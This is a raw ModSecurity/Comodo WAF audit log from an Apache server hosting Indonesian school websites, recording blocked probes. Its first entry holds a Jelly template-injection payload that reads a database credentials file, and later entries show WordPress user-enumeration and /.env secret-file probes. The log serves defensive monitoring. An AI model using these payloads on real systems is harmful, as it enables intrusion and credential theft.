Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aeac2718-Z-- --3bbbff00-A-- [28/May/2025:05:05:24 +0700] aDY3JA3r-0gDryHAyD-UNQAAAFQ 103.236.140.4 48524 103.236.140.4 8181 --3bbbff00-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/107.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 162490694 --3bbbff00-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3bbbff00-E-- --3bbbff00-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 206.82.6.62 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748383524777928 3667 (- - -) Stopwatch2: 1748383524777928 3667; combined=1701, p1=582, p2=1076, p3=0, p4=0, p5=43, sr=140, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3bbbff00-Z-- --07c07817-A-- [28/May/2025:06:02:11 +0700] aDZEcw3r-0gDryHAyD-eiwAAAFE 103.236.140.4 40152 103.236.140.4 8181 --07c07817-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.184.143.202 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.184.143.202 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --07c07817-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --07c07817-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748386931805049 2989 (- - -) Stopwatch2: 1748386931805049 2989; combined=1441, p1=441, p2=969, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07c07817-Z-- --c98e107e-A-- [28/May/2025:07:59:29 +0700] aDZf8fnnEwDNUSjDseIBywAAAIU 103.236.140.4 33014 103.236.140.4 8181 --c98e107e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 59.103.36.63 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 59.103.36.63 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c98e107e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c98e107e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748393969229554 3594 (- - -) Stopwatch2: 1748393969229554 3594; combined=1522, p1=510, p2=975, p3=0, p4=0, p5=36, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c98e107e-Z-- --744b333a-A-- [28/May/2025:08:10:13 +0700] aDZideszXCullgn3bbGPBQAAAAk 103.236.140.4 33100 103.236.140.4 8181 --744b333a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.90.238.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.90.238.234 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --744b333a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --744b333a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748394613832406 2407 (- - -) Stopwatch2: 1748394613832406 2407; combined=1233, p1=403, p2=795, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --744b333a-Z-- --7d45c377-A-- [28/May/2025:08:16:25 +0700] aDZj6eszXCullgn3bbGPCAAAABc 103.236.140.4 33168 103.236.140.4 8181 --7d45c377-B-- GET / HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 101.46.7.185 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 101.46.7.185 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.77 Safari/535.7ad-imcjapan-syosyaman-xkgi3lqg03!wgz Proxy-Connection: close --7d45c377-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d45c377-H-- Message: Access denied with code 403 (phase 2). Matched phrase "/Proxy-Connection/" at TX:header_name. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "33"] [id "210740"] [rev "2"] [msg "COMODO WAF: HTTP header is restricted by policy||smkn22-jkt.sch.id|F|4"] [data "/Proxy-Connection/"] [severity "WARNING"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748394985911897 1914 (- - -) Stopwatch2: 1748394985911897 1914; combined=697, p1=292, p2=380, p3=0, p4=0, p5=25, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d45c377-Z-- --5e3e5033-A-- [28/May/2025:08:34:29 +0700] aDZoJRwBHP_x2VCWa05nSwAAAMk 103.236.140.4 33224 103.236.140.4 8181 --5e3e5033-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Maemo; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1 Accept-Charset: utf-8 --5e3e5033-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e3e5033-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748396069192253 917 (- - -) Stopwatch2: 1748396069192253 917; combined=376, p1=329, p2=0, p3=0, p4=0, p5=47, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e3e5033-Z-- --7309bf1e-A-- [28/May/2025:08:38:58 +0700] aDZpMuszXCullgn3bbGPEQAAAAs 103.236.140.4 33242 103.236.140.4 8181 --7309bf1e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.177 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.177 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --7309bf1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7309bf1e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748396338666719 841 (- - -) Stopwatch2: 1748396338666719 841; combined=337, p1=299, p2=0, p3=0, p4=0, p5=38, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7309bf1e-Z-- --80311462-A-- [28/May/2025:08:39:03 +0700] aDZpN-szXCullgn3bbGPEgAAAA4 103.236.140.4 33244 103.236.140.4 8181 --80311462-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.177 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.177 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --80311462-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80311462-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748396343579501 752 (- - -) Stopwatch2: 1748396343579501 752; combined=305, p1=268, p2=0, p3=0, p4=0, p5=37, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80311462-Z-- --fa170c67-A-- [28/May/2025:08:58:55 +0700] aDZt3xwBHP_x2VCWa05nVAAAAM8 103.236.140.4 33768 103.236.140.4 8181 --fa170c67-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 209.124.100.226 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 209.124.100.226 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fa170c67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa170c67-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748397535565708 3162 (- - -) Stopwatch2: 1748397535565708 3162; combined=1404, p1=482, p2=885, p3=0, p4=0, p5=37, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa170c67-Z-- --377b865e-A-- [28/May/2025:09:07:42 +0700] aDZv7hwBHP_x2VCWa05nVQAAANA 103.236.140.4 33818 103.236.140.4 8181 --377b865e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 62.116.200.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 62.116.200.98 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --377b865e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --377b865e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748398062955727 3164 (- - -) Stopwatch2: 1748398062955727 3164; combined=1365, p1=485, p2=847, p3=0, p4=0, p5=33, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --377b865e-Z-- --4d5d162d-A-- [28/May/2025:09:19:00 +0700] aDZylBwBHP_x2VCWa05qGwAAAM4 103.236.140.4 39296 103.236.140.4 8181 --4d5d162d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 115.74.223.96 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 115.74.223.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4d5d162d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d5d162d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748398740140225 2948 (- - -) Stopwatch2: 1748398740140225 2948; combined=1373, p1=430, p2=913, p3=0, p4=0, p5=30, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d5d162d-Z-- --34f8085f-A-- [28/May/2025:09:23:48 +0700] aDZztPnnEwDNUSjDseIDMQAAAJE 103.236.140.4 42572 103.236.140.4 8181 --34f8085f-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.211.162.45 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.211.162.45 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --34f8085f-C-- õ¸examplecom --34f8085f-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --34f8085f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748399028752923 3474 (- - -) Stopwatch2: 1748399028752923 3474; combined=2201, p1=546, p2=1582, p3=23, p4=28, p5=22, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34f8085f-Z-- --b507d827-A-- [28/May/2025:09:23:49 +0700] aDZzteszXCullgn3bbGRdQAAAA4 103.236.140.4 42578 103.236.140.4 8181 --b507d827-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.211.162.45 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.211.162.45 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --b507d827-C-- ƒóexamplecom --b507d827-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --b507d827-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748399029026918 2924 (- - -) Stopwatch2: 1748399029026918 2924; combined=2021, p1=459, p2=1496, p3=20, p4=22, p5=24, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b507d827-Z-- --9b12c124-A-- [28/May/2025:09:23:49 +0700] aDZztfnnEwDNUSjDseIDNgAAAIY 103.236.140.4 42588 103.236.140.4 8181 --9b12c124-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.211.162.45 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.211.162.45 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --9b12c124-C-- [>examplecom --9b12c124-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b12c124-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748399029590559 3206 (- - -) Stopwatch2: 1748399029590559 3206; combined=2099, p1=430, p2=1589, p3=26, p4=27, p5=27, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b12c124-Z-- --76a9630f-A-- [28/May/2025:09:23:49 +0700] aDZztfnnEwDNUSjDseIDOgAAAIE 103.236.140.4 42598 103.236.140.4 8181 --76a9630f-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.211.162.45 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.211.162.45 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --76a9630f-C-- Dzexamplecom --76a9630f-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --76a9630f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748399029863946 4164 (- - -) Stopwatch2: 1748399029863946 4164; combined=2746, p1=536, p2=2113, p3=33, p4=37, p5=27, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76a9630f-Z-- --8d13656f-A-- [28/May/2025:09:23:50 +0700] aDZztvnnEwDNUSjDseIDPgAAAJc 103.236.140.4 42608 103.236.140.4 8181 --8d13656f-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.211.162.45 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.211.162.45 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --8d13656f-C-- ñÍexamplecom --8d13656f-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d13656f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748399030138573 3083 (- - -) Stopwatch2: 1748399030138573 3083; combined=2037, p1=433, p2=1536, p3=20, p4=23, p5=25, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d13656f-Z-- --d6e7c725-A-- [28/May/2025:09:23:50 +0700] aDZztvnnEwDNUSjDseIDQwAAAJA 103.236.140.4 42622 103.236.140.4 8181 --d6e7c725-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.211.162.45 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.211.162.45 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --d6e7c725-C-- ¸¤examplecom --d6e7c725-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6e7c725-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748399030701490 3982 (- - -) Stopwatch2: 1748399030701490 3982; combined=2482, p1=534, p2=1864, p3=27, p4=31, p5=26, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6e7c725-Z-- --91148c00-A-- [28/May/2025:09:23:50 +0700] aDZztvnnEwDNUSjDseIDSAAAAI4 103.236.140.4 42636 103.236.140.4 8181 --91148c00-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.211.162.45 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.211.162.45 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --91148c00-C-- I*examplecom --91148c00-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --91148c00-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file 